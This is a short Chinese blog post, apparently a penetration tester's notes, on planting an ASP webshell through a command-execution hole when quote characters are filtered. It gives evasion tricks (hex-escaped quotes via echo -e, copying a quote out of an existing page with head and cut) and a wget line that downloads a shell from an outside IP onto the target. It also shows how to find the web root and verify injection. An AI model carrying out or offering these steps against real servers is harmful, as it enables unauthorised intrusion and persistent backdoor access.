抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

引号被过滤

今天命令执行,想要上传马,遇到了引号被过滤掉的问题。最终找到了三种方式来解决。

  1. 用echo -e 对它16进制编码

    1
    echo -e "\x22hello\x22" >> a.asp
  2. 因为它本身的asp里面有引号,我通过它仅有的命令head和cut,把它摘到了我的上传文件中

    1
    head -n 1 home.asp | cut -c 23 >> a.asp
  3. 因为有个别的案例,它有wget命令,我就用它下载匿名服务器里的asp马进去了。

    1
    wget http://5.188.230.77/ps/shell.asp

不知道 WEB 路径在哪里

还遇到一些小问题。比如不知道web的路径在哪里,如果可以命令执行的话,就find访问的首页。

1
find / -name home.asp

这个返回路径,就是web的文件路径了。写入的时候,写进去这个web路径,但是GET访问的时候,直接根目录的去访问它。(因为相对路径的设置原因)也不一定是根目录,从命令执行的漏洞点进去之后,看自己的当前路径。当前路径在哪里,get就访问哪里

echo 用法问题

写入文件的时候,为了避免换行,可以用以下方式写入

1
echo -n "hello">a.txt

追加写入

1
echo -n "hello">>a.txt

找绝对路径

windows

可以挨个换盘符,实现全局搜索的目的

1
2
dir D:\*url.md* /s /b
dir D:\*2023-10-25 /s /b

POC 验证

POC验证的时候,执行命令,用echo字符串的方式来进行验证。或者可以用md5(1)这种方式来验证。但是因为有的系统没有md5.所以推荐用echo

评论